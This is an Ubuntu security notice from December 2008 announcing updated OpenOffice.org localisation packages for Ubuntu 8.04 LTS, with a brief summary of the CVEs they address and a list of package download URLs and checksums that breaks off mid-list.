Reply-To: Jamie Strandboge <jamie@canonical.com>
MIME-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
protocol="application/pgp-signature"; boundary="RnlQjJ0d97Da+TV1"
Content-Disposition: inline
User-Agent: Mutt/1.5.18 (2008-05-17)
Status:   


--RnlQjJ0d97Da+TV1
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

===========================================================
Ubuntu Security Notice USN-677-2          December 23, 2008
openoffice.org-l10n update
https://launchpad.net/bugs/310359
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 8.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.04 LTS:
  openoffice.org-l10n-af          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ar          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-as-in       1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-be-by       1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-bg          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-bn          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-br          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-bs          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ca          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-common      1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-cs          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-cy          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-da          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-de          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-dz          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-el          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-en-gb       1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-en-za       1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-eo          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-es          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-et          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-eu          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-fa          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-fi          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-fr          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ga          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-gl          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-gu-in       1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-he          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-hi-in       1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-hr          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-hu          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-it          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ja          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ka          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-km          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-kn          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ko          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ku          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-lo          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-lt          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-lv          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-mk          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ml-in       1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-mr-in       1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-nb          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ne          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-nl          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-nn          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-nr          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ns          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-or-in       1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-pa-in       1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-pl          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-pt          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-pt-br       1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ro          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ru          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-rw          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-sk          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-sl          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-sr          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ss          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-st          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-sv          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-sw          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ta-in       1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-te-in       1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-tg          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-th          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ti-er       1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-tn          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-tr          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ts          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-uk          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ur-in       1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-uz          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ve          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-vi          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-xh          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-zh-cn       1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-zh-tw       1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-zu          1:2.4.1-1ubuntu2.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

USN-677-1 fixed vulnerabilities in OpenOffice.org. The changes required that
openoffice.org-l10n also be updated for the new version in Ubuntu 8.04 LTS.

Original advisory details:

 Multiple memory overflow flaws were discovered in OpenOffice.org's handling of
 WMF and EMF files. If a user were tricked into opening a specially crafted
 document, a remote attacker might be able to execute arbitrary code with user
 privileges. (CVE-2008-2237, CVE-2008-2238)
 
 Dmitry E. Oboukhov discovered that senddoc, as included in OpenOffice.org,
 created temporary files in an insecure way. Local users could exploit a race
 condition to create or overwrite files with the privileges of the user invoking
 the program. This issue only affected Ubuntu 8.04 LTS. (CVE-2008-4937)


Updated packages for Ubuntu 8.04 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n_2.4.1-1ubuntu2.1.diff.gz
      Size/MD5: 95648512 2bb4fab680b880160f7b9033578e8a14
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n_2.4.1-1ubuntu2.1.dsc
      Size/MD5:     6955 c71b3c89d345252b218380e258ef7264
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n_2.4.1.orig.tar.gz
      Size/MD5: 278946187 4c601e202718781f5b6cf5f95c20974e

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-help-br_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  7534062 3c7fb5ba49b30d86f04dc55db64d406f
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-help-cs_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  7885066 25e97b76dae478541ee4c1151956d908
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-help-da_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  7835480 5e6aef98a711f9d442a0d9740570e9d6
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-help-de_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  8361244 9f5107e19fb7b8d1ad6f17e40e0672d3
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-help-dz_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  9942236 a5a1dc2b3fa4c8a3f5c3dbe217b89950
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-help-en-gb_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  7555310 3db4b6e652e69143a30de3262fd49396
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-help-en-us_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  7560818 cc3830c0fa16ceba016d083d7b485b21
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-help-es_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  8120828 254c4bd225c01bda060f99f6de8f9be6
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-help-et_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  7881022 072ff4fafed0dae1240f0b978f1f324c
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-help-eu_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  7906842 8ecf99005c6c640fd8cf48f74f948f40
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-help-fr_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  8249724 7a1feb453d32f61ebf2011a2fef987c0
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-help-gl_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  7914276 d3484847540142005df1922a901ddf0f
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-help-hi-in_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  8540802 4d7ece21e510861d2fc26bd303b52b4e
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-help-hu_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  8310046 722a6b4906310eba43da309d3b92b84a
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-help-it_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  8064220 247b350fa0910c0b25f592c87349add3
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-help-ja_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  9191440 3cceeb25b2a195eefb7ec00ac4c330be
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-help-km_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  8483618 27499e9a6c8c8df2cd119332ceba6917
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-help-ko_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  8132042 61130414aa2f7dfeb267f3f746a2ed85
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-help-nl_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  8002634 d2c611fb7388df6bb4c5492de9e60d73
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-help-pl_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  8140752 bb7a1e9afdbfaecb9a17a12ac830e59d
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-help-pt-br_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  8097324 a4845591e8f371fcc2ad9d8b184692ea
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-help-pt_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  8075794 a764f6f1e46f7bfe6cd31fdcee16b82a
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-help-ru_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  8690048 db63e32a0f9c01be5e04a514c67903f1
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-help-sl_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  7936452 26c91b77e304c2cf1066266d5dded922
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-help-sv_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  7821170 8322a57a62aeb65e571b4931fca55050
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-help-zh-cn_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  8624926 2b30fe40d890fc3e77a7b7e23635a644
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-help-zh-tw_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  8752482 e8fcf87e970d0046c8d907ef7bfbb33f
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-af_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   381476 82584c53dcdbd54f6695db4e4523f9bf
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-ar_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   393166 b8569a7cd3410f37cc65ea2d5bbd9b86
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-as-in_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   396414 89e66d358f2a0a2d6181c32e55967759
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-be-by_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   394906 77c5db33cb1e713a538b9de4f5ef82d2
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-bg_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  1449900 6a69d8a55d1648a6c647bedfaccc2fb2
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-bn_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   368078 3913990a147c4c837c5fd688bce8a5c9
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-br_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   386462 3e5d262cb02c34c4e754c47f06e2030b
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-bs_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   383942 a5e68774047ff6a915f337e2f03d8d82
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-ca_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   385560 b20ac47c38d0f76c696dfbc9ed146989
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-common_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   282696 f0127280488e1305726e20f254813682
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-cs_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  1400300 2903deb5e3b878138aad6594e814b612
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-cy_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   377162 714711d2a94bc407a78370c9a40cf54e
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-da_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  1371584 117efa08e85bc7349d40e8139cf649f1
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-de_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  1341404 f92ae4d4a089c645ad96bf854fad96e4
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-dz_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   422566 d2cab1558467935fa4041b17c5eda9d6
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-el_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   406048 8fecf601bd6bc7cab49da36b35989404
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-en-gb_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  1486472 9d2d0bf0468549f0229c513d9854eba3
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-en-za_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   362164 e5ad2e3204f943dfbab2d31615bce425
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-eo_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   379472 7b9cb344dccc0d2a0316db58c9e4fddf
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-es_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  1347064 debc61a5ed07d1644cca1355346616ea
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-et_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   378524 45e1d6e858592765571472bc0656dd50
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-eu_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   379228 7283da14d737070a4c2b9bab99a80308
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-fa_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   385602 cb4885d70d81e886a3a7bee9aab96eaa
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-fi_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   380232 dd70f444d38e1d3b0362615e41363746
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-fr_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  1327876 95e07c384ff15d729fc56e170598b1a2
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-ga_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   392544 65f3d0b8edb7c9ffb166c91136f13f66
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-gl_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   387184 1ef2fd54517431cf6e927902c87e8219
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-gu-in_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   408546 43edb4072576b3d0917b78cc086d7baa
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-he_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   387610 756ba0545666b49486d9ab88423c462b
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-hi-in_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   407616 a5fa51d878f2a72dbbc31250a6e9a4c8
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-hr_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   391410 a86e8f312180b9104b4175405984a1ef
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-hu_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  1430760 c7bfede414eaab38111ac7b70f1c77de
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-it_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  1348846 76a48856f975dfd869ac7b25a8f88216
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-ja_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  1413988 c96d7e8f71f32b0d2c53612f6687d5ba
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-ka_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   410230 5f2d119a2f75dcd3e78e1f4488ee0e6f
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-km_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  1498852 231f5b53845ec639705db2ea6c11626a
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-kn_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   319292 ae93ead691eb7bc6598bd3795d913432
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-ko_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  1324926 6acaf685ed5cecdd07d1f747f11e52a9
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-ku_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   399414 4bbc26791a7e391c0812b34294abb10c
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-lo_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   399472 e032e76a329e0fb2b6119c6aa92b5e04
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-lt_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   388234 f31ec2fdc0c9e516e138c31c583047c9
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-lv_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   391444 38f39ba11e9b016daf41d43aae854be7
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-mk_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   404582 85f8c386b83c917d011e477d5e8f58be
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-ml-in_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   400196 501fbc0e86b2720e08fc62c649ab0f01
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-mr-in_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   403518 ff771cdaf44295ecc2dbcacacd8d4107
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-nb_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   379982 fcfc2d5cf7d3bea1d51e16f204f89303
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-ne_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   403874 d1ae9d4c9133b402b5d43e4640156fef
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-nl_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  1379918 48015e42b02cf2f888039f033d67fe0b
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-nn_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   378830 7c233cd494763c121e5404ce346c5219
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-nr_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   403230 c42a08ebf1bae55509b3144b7c0c283f
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-ns_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   395838 650942fc19ae6216b1b86e89d66f7f8f
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-or-in_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   401520 c4326301d4b055f4158ae6e62a8a2fe2
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-pa-in_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   397976 3d77f394280cd9477d650167ef4782cb
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-pl_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  1344054 054f1656cd1048041ac1d60574c422a4
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-pt-br_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  1343860 e050d8e768bf85c191ceb58e6cf31cb9
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-pt_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  1396070 8dd9e6369d02729163a23e07ded3840f
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-ro_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   333130 00dc5e75bbf8d6f5705a7e1c9d21a770
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-ru_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  1351626 45ce1dd032c805792443973dbe519205
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-rw_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   385396 47133c6c7e6caa3895e6fadc2568d4cf
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-sk_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  1403292 ef3f713fd0a00ecdbca5421783a846e7
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-sl_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  1427328 96da10ac580d494673fc736e10d5347f
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-sr_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   400068 cfb6b7a9c3f07b58856f497f77d20a9f
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-ss_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   396660 f3ed6214c454beae54da3c8fd6f1815e
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-st_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   396808 db5c8774252cddb451ba6108107e1bb3
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-sv_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  1317536 403537ee603a0129e8d165db6cbcb7ab
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-sw_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   319206 70a4233546c2bee5f6db28d5f260d6f3
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-ta-in_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   401000 e2686c75c5aeaf20a6b11a1cb9962510
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-te-in_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   409040 1e5bb9e95a4061571e0870d3937a9ea9
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-tg_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   392478 fb0d24ac8d7f1fe5ff6e4431e441a723
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-th_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   401610 16f69b2510e2053072f812c05e62bd22
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-ti-er_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   340136 0cd583e8eb0fe794ef269af65e4b6532
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-tn_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   366112 21a09f2cd76067fef85ff6e7281bab7b
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-tr_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   811354 ebd1246830607c78071b5ffb015e1771
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-ts_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   395648 1a8ecc582426eb11687ae1799c1164fc
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-uk_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   400234 d652cbd6d62b437b5fa75394a77bfed6
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-ur-in_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   400918 cdd50532affdbf2c16f74ca8cbe787e4
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-uz_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   386602 ae8022fc2d8705d83b8f3f86162f0a67
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-ve_2.4.1-1ubuntu2.1_all.deb
